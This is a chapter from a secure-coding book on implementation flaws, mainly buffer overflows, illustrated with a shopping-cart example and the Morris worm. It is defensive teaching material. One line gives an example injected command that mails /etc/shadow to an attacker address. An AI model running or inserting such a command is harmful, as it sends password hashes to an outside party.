Chapter 4. Implementation

   

Your knowledge is of a meager and unsatisfactory kind; it may be the beginning of knowledge but you have scarcely in your thoughts advanced to the state of science.

William Thomson, Lord Kelvin, On Measurement , 1894

An implementation flaw is a mistake made while writing the software; most, though not all, implementation flaws are coding flaws per se. In our view, implementation flaws typically arise because the programmer is either unfamiliar with secure coding techniques or unwilling to take the trouble to apply them. (No doubt because we like to believe the best in human nature, we think it's much rarer that someone tries hard and fails to successfully write secure code.)

Looking back to the example of the SYN flood attacks, there were certainly implementation flaws in addition to the principal design flaw that led to the attacks. For example, when the array of TCP sockets became exhausted, some operating systems at the time simply crashed. This was the result of a memory overflow that occurred when the software attempted to store an out-of-bounds array value. At the very least, a carefully implemented TCP stack could have prevented such catastrophic failure of the operating systems.

Source code is the final stage in the translation of a design into something users can use, prior to the software's being subjected to testing and (eventually) production. Flaws in source code, therefore, have a direct link to the user base; because the machine translation of the source code is exactly what gets executed by the computer at production time, there is no margin of error here. Even a superbly designed program or module can be rendered unsecure by a programmer who makes a mistake during this last crucial step.

Consider a simple example of a programming error in a web-based shopping cart. Imagine that an otherwise flawlessly designed and implemented program inverts a Euro-to-dollar currency conversion algorithm, so that a person paying with Euros ends up getting a 20% discount on goods purchased. Needless to say, when the first European makes a purchase and reviews the bill, a flood of gleeful purchases from Europe will ensue.

This trivialized example points out how a human mistake in the programming processan implementation flawcan result in serious business problems for the person or company running the flawed software.

Now, let's put this into the context of a security issue. The classic example of an implementation security flaw is the buffer overflow. We discuss such flaws later in this chapter (see the sidebar Buffer Overflows), but for now, we simply provide a quick overview and look at how buffer-overflow flaws can be introduced into a software product.

A buffer overflow occurs when a program accepts more input than it has allocated space for. In the types of cases that make the news, a serious vulnerability results when the program receives unchecked input data from a user (or some other data input source). The results can range from the program's crashing (usually ungracefully) to an attacker's being able to execute an arbitrary program or command on the victim's computer, invariably resulting in the attacker's attaining privileged access on the victim's computer.

Thinking back to our shopping cart and Euro-to-dollar conversion example, let's consider how a buffer-overflow situation might play out in the same software. In addition to the monetary conversion flaw, the software coders that wrote this software neglected to adequately screen user input data. In this hypothetical example, the developer assumed that the maximum quantity of any single item purchased in the shopping cart would be 999that is, 3 digits. So, in writing the code, 3 digits of input data are allocated. However, a malicious-minded user looking at the site decides to see what will happen if he enters, say, a quantity of 1025 digits. If the application doesn't properly screen this input and instead passes it to the back-end database, it is possible that either the middleware software (perhaps PHP or some other common middleware language) or the back-end database running the application will crash.

Take this scenario one step further now. Our attacker has a copy of the software running in his own environment and he analyzes it quite carefully. In looking over the application code, he discovers that the buffer-overflow situation actually results in a portion of the user input field spilling into the CPU's stack and, under certain circumstances, being executed. If the attacker carefully generates an input stream that includes some chosen textfor example, #!/bin/sh Mail bob@attack.com < /etc/shadow then it's possible that the command could get run on the web server computer.

Not likely, you say? That's exactly how Robert T. Morris's Internet worm duped the Berkeley Unix finger daemon into running a command and copying itself to each new victim computer back in early November of 1988.

Buffer Overflows

Buffer-overflow disasters have been so widespread in modern software that they were the primary factor convincing us to write this book. Indeed, we could fill a good- sized volume with sad security tales on this topic alone. Go see for yourself; take a look at the security patches released by software vendors over just about any several-month period in the past few years . You will find that a huge percentage of the patches relate to vulnerabilities with buffer overflows as their root cause. We believe that every one of these implementation flaws was avoidable, and without a great deal of effort on the parts of their respective programmers.

Buffer overflows, in particular, have been commonly known and documented for years. The Internet worm [1] was one of the first documented cases of a buffer overflow exploit in action. At the very least, we should all have learned from that incident, and removed buffer overflows from any and all software written since that time.

It's also only fair to note here that some operating systems provide internal protection against buffer overflows, thus relieving the programmer of the burden of having to write code that prevents them. (The fact that some of the most popular operating systems do not provide this type of protection probably doesn't speak well for our selection criteria!)

[1] Eugene H. Spafford. "Crisis and Aftermath." Communications of the ACM , Vol 32 No 6, June 1989, pp. 678-687.

In the remainder of this chapter, we discuss ways to fight buffer overflows and other types of implementation flaws. The good news for you is that, although implementation flaws can have major adverse consequences, they are generally far easier than design flaws both to detect and to remedy. Various toolsboth commercial and open sourcesimplify the process of testing software code for the most common flaws (including buffer overflows) before the software is deployed into production environments.

The following sections list the implementation practices we recommend you use, as well as those we advise you to avoid.

These practices emphasize security issues and are, of course, no substitute for sound software engineering processes. We feel strongly that software engineering practices are vital in the development of any code; this emphasis on security issues is a mere subset of the reasons why. The deservedly revered Software Engineering Institute (SEI) has, for instance, been studying and writing about such issues for decades. There are some great books on this subject. We list our favorites in Appendix A.

   


Secure Coding[c] Principles and Practices 2003
Secure Coding[c] Principles and Practices 2003
ISBN: 596002424
EAN: N/A
Year: 2004
Pages: 81

flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net